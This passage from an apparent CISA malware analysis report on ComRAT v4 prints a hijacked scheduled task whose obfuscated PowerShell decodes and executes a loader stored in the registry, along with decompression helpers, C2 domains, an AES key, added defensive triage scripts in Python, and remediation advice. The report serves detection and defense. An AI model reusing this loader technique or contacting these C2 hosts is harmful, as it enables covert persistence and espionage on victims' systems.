   <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
   <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
   <WakeToRun>false</WakeToRun>
   <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
   <Priority>7</Priority>
</Settings>
<Actions Context="WinSQMAccount">
   <Exec>
    <Command>cmd.exe</Command>
    <Arguments>/c "%SystemRoot%\System32\wsqmcons.exe &amp; PowerShell.exe -v 2 "$GS459ea = 'KVYYOBBA4331110uhyicnoor';
[Text.Encoding]::ASCII.GetString([Convert]::"Fr`omBa`se6`4Str`ing"((gp HKLM:\SOFTWARE\Microsoft\SQMClient\Windows).WSqmCons))|iex;
""</Arguments>
   </Exec>
</Actions>
</Task>
--End Modified Scheduled Task--

The portion of the modified scheduled task illustrated below indicates that the primary purpose of this task modification is to decode and execute a PowerShell script stored in the WSqmCons value of the registry key HKLM:\SOFTWARE\Microsoft\SQMClient\Windows:

--Begin Specific Scheduled Task Module--
<Actions Context="WinSQMAccount">
   <Exec>
    <Command>cmd.exe</Command>
    <Arguments>/c "%SystemRoot%\System32\wsqmcons.exe &amp; PowerShell.exe -v 2 "$GS459ea = 'KVYYOBBA4331110uhyicnoor';
[Text.Encoding]::ASCII.GetString([Convert]::"Fr`omBa`se6`4Str`ing"((gp HKLM:\SOFTWARE\Microsoft\SQMClient\Windows).WSqmCons))|iex;
""</Arguments>
--End Specific Scheduled Task Module--

This malicious script installs a PowerShell script (a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642) into the “WSqmCons” registry value. The primary purpose of the newly installed PowerShell script is to decode and load a malicious DLL, identified as ComRAT v4 (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316), onto the victim’s system.
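An added example (not CISA's tooling) that summarises the original and modified task definitions shown above and reports what changed, including the backtick-stripping step a triage script needs before it can match the obfuscated FromBase64String call; the two XML fragments are abridged from the report's Consolidator task and keep its values, and the suspicious-substring list is an assumption of the example.

```python
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Abridged from the report's original Consolidator task: only the elements compared below.
ORIGINAL_TASK = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers>
   <TimeTrigger>
    <StartBoundary>2004-01-02T00:00:00</StartBoundary>
    <Repetition><Interval>PT6H</Interval></Repetition>
   </TimeTrigger>
</Triggers>
<Principals><Principal id="WinSQMAccount"><UserId>S-1-5-18</UserId></Principal></Principals>
<Actions Context="WinSQMAccount">
   <Exec><Command>%SystemRoot%\\System32\\wsqmcons.exe</Command></Exec>
</Actions>
</Task>"""

# Abridged from the report's modified task; the Arguments text is the page's own.
MODIFIED_TASK = """<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers>
   <TimeTrigger>
    <Repetition><Interval>PT6H</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
    <StartBoundary>2004-01-02T00:00:00</StartBoundary>
    <Enabled>true</Enabled>
   </TimeTrigger>
   <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
</Triggers>
<Principals><Principal id="WinSQMAccount"><RunLevel>LeastPrivilege</RunLevel><UserId>SYSTEM</UserId></Principal></Principals>
<Actions Context="WinSQMAccount">
   <Exec>
    <Command>cmd.exe</Command>
    <Arguments>/c "%SystemRoot%\\System32\\wsqmcons.exe &amp; PowerShell.exe -v 2 "$GS459ea = 'KVYYOBBA4331110uhyicnoor';
[Text.Encoding]::ASCII.GetString([Convert]::"Fr`omBa`se6`4Str`ing"((gp HKLM:\\SOFTWARE\\Microsoft\\SQMClient\\Windows).WSqmCons))|iex;
""</Arguments>
   </Exec>
</Actions>
</Task>"""

# Assumed indicator list: substrings that, once the backtick obfuscation is removed,
# mark this action as a registry-resident loader rather than the stock wsqmcons.exe run.
SUSPICIOUS = ("frombase64string", "|iex", "invoke-expression", "-v 2", "gp hklm:", "get-itemproperty hklm:")


def deobfuscate_powershell(cmdline):
    """PowerShell ignores a backtick before an ordinary letter, so "Fr`omBa`se6`4Str`ing" is
    FromBase64String at run time; strip the backticks and fold case before matching."""
    return cmdline.replace("`", "").lower()


def summarize_task(xml_text):
    """The fields an analyst compares between a baseline and a live task definition."""
    root = ET.fromstring(xml_text)

    def text(path):
        el = root.find(path, NS)
        return (el.text or "").strip() if el is not None else ""

    triggers = root.find("t:Triggers", NS)
    trigger_types = [] if triggers is None else sorted(c.tag.split("}")[1] for c in triggers)
    return {
        "triggers": trigger_types,
        "user": text("t:Principals/t:Principal/t:UserId"),
        "command": text("t:Actions/t:Exec/t:Command"),
        "arguments": text("t:Actions/t:Exec/t:Arguments"),
    }


def task_findings(baseline_xml, current_xml):
    """Findings for a task that drifted from its baseline; an empty list means unchanged and clean."""
    base, cur = summarize_task(baseline_xml), summarize_task(current_xml)
    findings = []
    if cur["command"] != base["command"]:
        findings.append(f"command changed: {base['command']} -> {cur['command']}")
    if cur["triggers"] != base["triggers"]:
        findings.append("triggers changed: " + ",".join(cur["triggers"]))
    if cur["user"] != base["user"]:
        # S-1-5-18 and SYSTEM name the same account; the rewrite of the principal is itself the signal.
        findings.append(f"principal changed: {base['user']} -> {cur['user']}")
    hits = [s for s in SUSPICIOUS if s in deobfuscate_powershell(cur["arguments"])]
    if hits:
        findings.append("suspicious arguments: " + ",".join(hits))
    return findings


if __name__ == "__main__":
    for line in task_findings(ORIGINAL_TASK, MODIFIED_TASK):
        print(line)
```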

a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642

Tags

trojan

Details
Name Decode_PowerShell.ps1
Size 1264496 bytes
Type ASCII text, with very long lines, with CRLF, LF line terminators
MD5 0fd79f4c60593f6aae69ff22086c3bb0
SHA1 07f0692c856703d75a9946a0fbb3c0db03f7ac40
SHA256 a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642
SHA512 28a0ae0a779aa88499f70cf97ef9db9482527017ea76ee2e469e4184684c4d4fb0559e50f1721e7e9d02655bee4cdf7b12c62a3d037ea10130121cfbb772e250
ssdeep 24576:jarQlVyeHtWdf7PyJjwLKWp57+7fb0TLaB7VrE:jD567vs1tm
Entropy 6.091278
Antivirus
Antiy GrayWare/PowerShell.Mimikatz.a
ClamAV Win.Trojan.PSempireInj-7013548-0
Microsoft Security Essentials Trojan:PowerShell/Powersploit.J
NANOAV Trojan.Script.ExpKit.eydujq
Symantec Hacktool.Mimikatz
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
a3170c32c0… Contained_Within 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8
a3170c32c0… Dropped 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
Description

This heavily encoded PowerShell script is installed by the malicious script “corrected.ps1” (134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8). It is designed to decode and load an embedded DLL that has been identified as a variant of the malware known as ComRAT v4, “ComRATv4.exe” (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316).

Removal of some of the PowerShell obfuscation reveals the functions illustrated below. These functions are used to decompress the embedded DLL before it is loaded on the target system:

—Begin PowerShell Helper Functions—
   using System;
   using System.IO;
   using System.IO.Compression;

   // Copies one stream into another in 16 KB chunks; used by both helpers below.
   public static class CD475bjf{
       public static void DBQ800fc(Stream input, Stream output){
           byte[] buffer = new byte[16 * 1024];
           int bytesRead;
           while((bytesRead = input.Read(buffer, 0, buffer.Length)) > 0){
               output.Write(buffer, 0, bytesRead);
           }
       }
   }

   public static class MAE38aee{

       // GZip-compresses a byte array; the inner using blocks close the GZipStream
       // (flushing it) before the outer MemoryStream is read back.
       public static byte[] JZ653jdh(byte[] arrayToCompress){
           using (MemoryStream outStream = new MemoryStream()){
               using (GZipStream tinyStream = new GZipStream(outStream, CompressionMode.Compress))
               using (MemoryStream mStream = new MemoryStream(arrayToCompress))
                   CD475bjf.DBQ800fc(mStream, tinyStream);
               return outStream.ToArray();
           }
       }

       // GZip-decompresses the embedded DLL bytes before they are loaded.
       public static byte[] PGN255ij(byte[] arrayToDecompress){
           using (MemoryStream inStream = new MemoryStream(arrayToDecompress))
           using (GZipStream bigStream = new GZipStream(inStream, CompressionMode.Decompress))
           using (MemoryStream bigStreamOut = new MemoryStream()){
               CD475bjf.DBQ800fc(bigStream, bigStreamOut);
               return bigStreamOut.ToArray();
           }
       }
   }

#decode base64 above
$decompress = [Convert]::FromBase64String($decompressbase64);

#create another text object for use later
$NS70gea = New-Object System.Text.ASCIIEncoding;

#convert base64 decoded value to string
$decompress = $NS70gea.GetString($decompress,0,$decompress.Length);
—End PowerShell Helper Functions—

Figure 1 illustrates part of the payload embedded within this malicious script. The encoded PowerShell script contains an embedded function named “Run” that can load a DLL directly from memory and inject it into a remote process (Figure 2). The PowerShell script injects the embedded ComRAT DLL (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316) into the Windows Explorer process.
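An analyst usually wants the embedded DLL without running the loader. The Python example below is added here and is not the report's or the malware's code: it pulls the long base64 run out of a script, mirrors the PGN255ij gunzip step, and reads the COFF header so the timestamp can be compared with the Compile Date given further down for ComRATv4.exe. The script fragment and the stand-in DLL are constructed; the DLL is only valid MZ/PE headers with filler.

```python
import base64
import gzip
import re
import struct
from datetime import datetime, timezone
from typing import List, Optional

# Payloads are kept as one long base64 run; cmdlet-sized strings never reach this length.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def extract_base64_blobs(script_text: str) -> List[bytes]:
    """Decode every long base64 run found in the script text."""
    blobs = []
    for match in BASE64_RUN.finditer(script_text):
        try:
            blobs.append(base64.b64decode(match.group(0), validate=True))
        except ValueError:  # a run that is not valid base64 after all
            continue
    return blobs


def unwrap_payload(data: bytes) -> bytes:
    """Mirror PGN255ij above: gunzip when the gzip magic is present, otherwise pass through."""
    return gzip.decompress(data) if data[:2] == b"\x1f\x8b" else data


def pe_summary(data: bytes) -> Optional[dict]:
    """Confirm a PE image and pull machine type, DLL flag and COFF timestamp from it."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if len(data) < e_lfanew + 24 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics.
    machine, _, stamp, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    return {
        "machine": {0x14C: "x86", 0x8664: "x64"}.get(machine, hex(machine)),
        "is_dll": bool(chars & 0x2000),  # IMAGE_FILE_DLL
        "compiled": datetime.fromtimestamp(stamp, tz=timezone.utc),
    }


def triage(script_text: str) -> List[dict]:
    """Run decode -> gunzip -> PE check over a script and describe each image found."""
    found = []
    for blob in extract_base64_blobs(script_text):
        info = pe_summary(unwrap_payload(blob))
        if info:
            found.append(info)
    return found


def build_fake_pe(stamp: int, machine: int = 0x8664) -> bytes:
    """Constructed stand-in for the embedded DLL: valid MZ/PE headers, no code."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos = dos.ljust(e_lfanew, b"\0")
    # Characteristics: EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE | DLL
    coff = struct.pack("<HHIIIHH", machine, 1, stamp, 0, 0, 0, 0x2022)
    return dos + b"PE\0\0" + coff + bytes(range(256))  # incompressible filler


# Constructed script fragment shaped like the loader's tail, carrying a gzipped DLL in
# $decompressbase64. The timestamp is the report's Compile Date for ComRATv4.exe (UTC).
COMPILE_TS = int(datetime(2018, 3, 6, 14, 38, 38, tzinfo=timezone.utc).timestamp())
SAMPLE_SCRIPT = (
    "$decompressbase64 = '"
    + base64.b64encode(gzip.compress(build_fake_pe(COMPILE_TS))).decode()
    + "';\n$decompress = [Convert]::FromBase64String($decompressbase64);\n"
)

if __name__ == "__main__":
    for image in triage(SAMPLE_SCRIPT):
        print(image)
```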

Screenshots

Figure 1 - Screenshot of the payload embedded within this malicious script.

Figure 2 - Screenshot of the function used to load a DLL directly from memory and inject it into a remote process.

44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316

Tags

trojan

Details
Name ComRATv4.exe
Size 1827840 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 faaafa3e115033ba5115ed6a6ba59ba9
SHA1 ca16a95cd38707bad2dc524bb3086b3c0cb3e372
SHA256 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
SHA512 6f2fe02c1e15be2409f89ff1e6ae3c78f87e242ee448fe5ff6d375a74f10c7c6cc01f3f6d796aa34599a891e03c5d421d10f0c041e5a6dc0e346aea3ae21a935
ssdeep 49152:jTRjrgdOU9p1PZH/JNTFTJT5dwIwzQJH:PRCBNTBwAH
Entropy 6.463931
Antivirus
Ahnlab Trojan/Win64.Turla
ESET a variant of Win64/Turla.BX trojan
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-06 09:38:38-05:00
Import Hash d9d661a606c9d1c23b47672d1067de68
PE Sections
MD5 Name Raw Size Entropy
11525199e6e248e88e0529cf72a9002d header 1024 2.934959
0f3258519a92690d14406e141dcb285b .text 1027584 6.441800
fa4840dc4653443d4574486df39bc6a3 .rdata 481280 4.896843
ca22c78d526550925d7843a24cd1d266 .data 264704 7.368343
f7cc8fa49cfa87a125d8354082e162f3 .pdata 47104 6.030652
ef6fdd7440f36ba21373b4585a5c83e4 .rsrc 512 4.724729
4f16258cf938a4bc7fe0ae92121f442d .reloc 5632 5.425381
Relationships
44d6d67b53… Contains 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
44d6d67b53… Contains 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
44d6d67b53… Dropped_By a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642
Description

This application is a 32-bit Windows DLL that has been identified as a module of ComRAT v4. The DLL is loaded into Windows Explorer (Explorer.exe) by a ComRAT PowerShell loader (a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642). When executed, it checks the victim’s system time and only performs code execution between 9 AM and 5 PM, Monday through Friday. During execution, it installs the following files into the %TEMP% folder:

–Begin files–
“%TEMP%\iecache.bin” ==> an AES-256-XTS encrypted VFS in FAT16 format, containing the malware configuration and the log files. (The encryption key is generated at runtime and stored in the Windows registry.)
“%TEMP%\FSAPIDebugLogFile.txt”
–End files–

The malware injects an embedded communication module (00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d or 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405) into the victim system’s default browser and executes it. The two components communicate with each other over a named pipe: the malware uses it to send HTTP requests to, and receive HTTP responses from, the communication module in order to obtain backdoor commands. It is designed to use the Gmail web interface to receive commands and exfiltrate data.

Illustrated below are sample data observed in the decrypted VFS in FAT16 format. Some of these files can be updated in the VFS using backdoor commands.

–Begin sample data in the VFS–
“/etc/pal/” contains a list of C2 domains: “bronerg.tk|crusider.tk|duke6.tk”
“/etc/gal.bin” contains a list of C2 domains: “sanitar.ml|wekanda.tk|branter.tk”
“/etc/pki/aes_key.pki” contains the Advanced Encryption Standard (AES) encryption keys for the C2 communications:

–Begin AES key–
4F8112E9E5AB5391C584D567B58E539F0400094A83EA0C2DDC7FA455FCF447B1
–End AES key–

“/etc/pki/public_cert.pki” contains the Rivest–Shamir–Adleman (RSA) encryption key used for the C2 communications:

–Begin RSA key–
–End RSA key–

It uses RSA public-key cryptography together with AES-encrypted email attachments for its Gmail C2 channel.
“/etc/mail/subj_dict” contains the Subject prefixes “Re: |RE: |FW: |FWD: | Fw: | Fwd:| FYI: |FYIP |NRN: | NT: | N/T | n/t| NB |NM| n/m |N/M: |*n/m*”

“/etc/php_storage/GET/DEF/server.txt” and “/etc/php_storage/POST/DEF/server.txt” contain the server IP “172.22.150.125”.
–End sample data in the VFS–

Screenshots

Figure 3 - The first bytes of the decrypted VFS in FAT16 format.

Figure 4 - The decrypted VFS hierarchy, containing the malware configuration and the log files.

00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

Tags

backdoor, downloader, loader, trojan

Details
Name Communication_module_32.dll
Size 61440 bytes
Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 e509c3a40045d2dab9404240f3f201ed
SHA1 86f747cac3b16ed2dab6d9f72a347145ff7a850d
SHA256 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
SHA512 f78827b6fc258f4a63dd17fec2acb7114329a9d7fd426c72838f2e5e5c54c12fce7be7a0eb9c7e7e74b01fe80c42293ef89c3bcbafd230a68f9639e57f62bb6f
ssdeep 1536:zlAjaBOUFoD0C8YQ7aZS7C2kkAxWzg39xa3cdjrH++:zl2uOUG0CBQ7aZS7C3uzg39xEM
Entropy 5.338807
Antivirus
Antiy Trojan[Backdoor]/Win32.Turla
Avira TR/Crypt.XPACK.Gen3
ESET a variant of Win32/Turla.EO trojan
Ikarus Trojan-Downloader.Win32.Farfli
NANOAV Trojan.Win32.Turla.hlrzcr
Symantec Heur.AdvML.B
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-06 09:36:54-05:00
Import Hash 87ab41c57e95562a3e81f0609398b278
PE Sections
MD5 Name Raw Size Entropy
b9bd1636e8c11ff1ab2368771e89cfac header 4096 0.612975
077bf2412ba289da7b6261ffec65988d .text 49152 6.051754
1c95870051ff12b740487ff93d19ef3b .rdata 4096 0.317233
b86e403ac8c58a013fe4cda6b6715804 .reloc 4096 0.019202
Relationships
00352afc7e… Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
00352afc7e… Connected_To branter.tk
00352afc7e… Connected_To wekanda.tk
00352afc7e… Connected_To sanitar.ml
00352afc7e… Connected_To duke6.tk
00352afc7e… Connected_To bronerg.tk
00352afc7e… Connected_To crusider.tk
Description

This application is a 32-bit Windows DLL that has been identified as the communication module injected into the victim system’s default browser by “ComRATv4.exe” (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316). It is designed to use HTTP and the Gmail web interface for C2, and it attempts to connect to its C2 over secure connections (TCP port 443).

–Begin list of domains–
bronerg.tk
crusider.tk
duke6.tk
sanitar.ml
wekanda.tk
branter.tk
–End list of domains–

Displayed below is a sample request header:

–Begin header–
CONNECT bronerg[.]tk:443 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: bronerg.tk:443
Content-Length: 0
Connection: Keep-Alive
–End header–

bronerg.tk

Tags

command-and-control

Whois

Domain name:
    BRONERG.TK

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships
bronerg.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
bronerg.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
Description

ComRAT v4 C2 domain.

crusider.tk

Tags

command-and-control

Ports
  • 443 TCP
Whois

Domain name:
    CRUSIDER.TK

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships
crusider.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
crusider.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
Description

ComRAT v4 C2 domain.

duke6.tk

Tags

command-and-control

Whois

Domain name:
    DUKE6.TK

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships
duke6.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
duke6.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
Description

ComRAT v4 C2 domain.

sanitar.ml

Tags

command-and-control

Whois

Domain name:
    SANITAR.ML

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships
sanitar.ml Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
sanitar.ml Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
Description

ComRAT v4 C2 domain.

wekanda.tk

Tags

command-and-control

Whois

Domain name:
    WEKANDA.TK

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships
wekanda.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
wekanda.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
Description

ComRAT v4 C2 domain.

branter.tk

Tags

command-and-control

Ports
  • 443 TCP
Whois

No Whois record at the time of analysis.

Relationships
branter.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
branter.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
Description

ComRAT v4 C2 domain.

166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

Tags

trojan

Details
Name Communication_module_64.dll
Size 64000 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 54902e33dd6d642bc5530de33b19e43c
SHA1 a06f0e29fca6eb29bf5334fb3b84a872172b0e28
SHA256 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
SHA512 28b8f63af33f4aebd2b5b582750036db718f657640aca649d4b2b95188661da3834398a56184ee08f64ddf1d32198e722be46dbfbc78e49e0d276fe6c5234b94
ssdeep 1536:p2JmzHKhyOjQuCLA/9zYgJS7aWSXEuT2XWZdjoEGbgqPU6Izj6N1o6OtAEBiUm5+:p2JmcjQuCLA/VYgJS7H21yXQdj5G0qMy
Entropy 5.939047
Antivirus
ESET a variant of Win64/Turla.CN trojan
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-06 09:37:48-05:00
Import Hash 87ab41c57e95562a3e81f0609398b278
PE Sections
MD5 Name Raw Size Entropy
199ab75383a70bd1148671ca1c689d0e header 1024 2.031353
46c52ca20a919c2314e32193eac9ec66 .text 60416 5.990363
a97e460909f791b5d0b571099a5b7b56 .rdata 1536 4.519592
c5ba9ad86e832155180da146aef6eabc .pdata 1024 3.061435
Relationships
166b1fb3d3… Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
166b1fb3d3… Connected_To bronerg.tk
166b1fb3d3… Connected_To crusider.tk
166b1fb3d3… Connected_To duke6.tk
166b1fb3d3… Connected_To sanitar.ml
166b1fb3d3… Connected_To wekanda.tk
166b1fb3d3… Connected_To branter.tk
Description

This application is a 64-bit Windows DLL that has been identified as the communication module injected into the victim’s system default browser by “ComRATv4.exe” (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316). The DLL is similar to the 32-bit communication module (00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d).

Relationship Summary

1349191514… Contains a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642
a3170c32c0… Contained_Within 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8
a3170c32c0… Dropped 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
44d6d67b53… Contains 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
44d6d67b53… Contains 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
44d6d67b53… Dropped_By a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642
00352afc7e… Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
00352afc7e… Connected_To branter.tk
00352afc7e… Connected_To wekanda.tk
00352afc7e… Connected_To sanitar.ml
00352afc7e… Connected_To duke6.tk
00352afc7e… Connected_To bronerg.tk
00352afc7e… Connected_To crusider.tk
bronerg.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
bronerg.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
crusider.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
crusider.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
duke6.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
duke6.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
sanitar.ml Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
sanitar.ml Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
wekanda.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
wekanda.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
branter.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
branter.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
166b1fb3d3… Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
166b1fb3d3… Connected_To bronerg.tk
166b1fb3d3… Connected_To crusider.tk
166b1fb3d3… Connected_To duke6.tk
166b1fb3d3… Connected_To sanitar.ml
166b1fb3d3… Connected_To wekanda.tk
166b1fb3d3… Connected_To branter.tk

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to CISA at 1-888-282-0870 or the CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Revisions

  • October 29, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: October 1, 2020


Notification

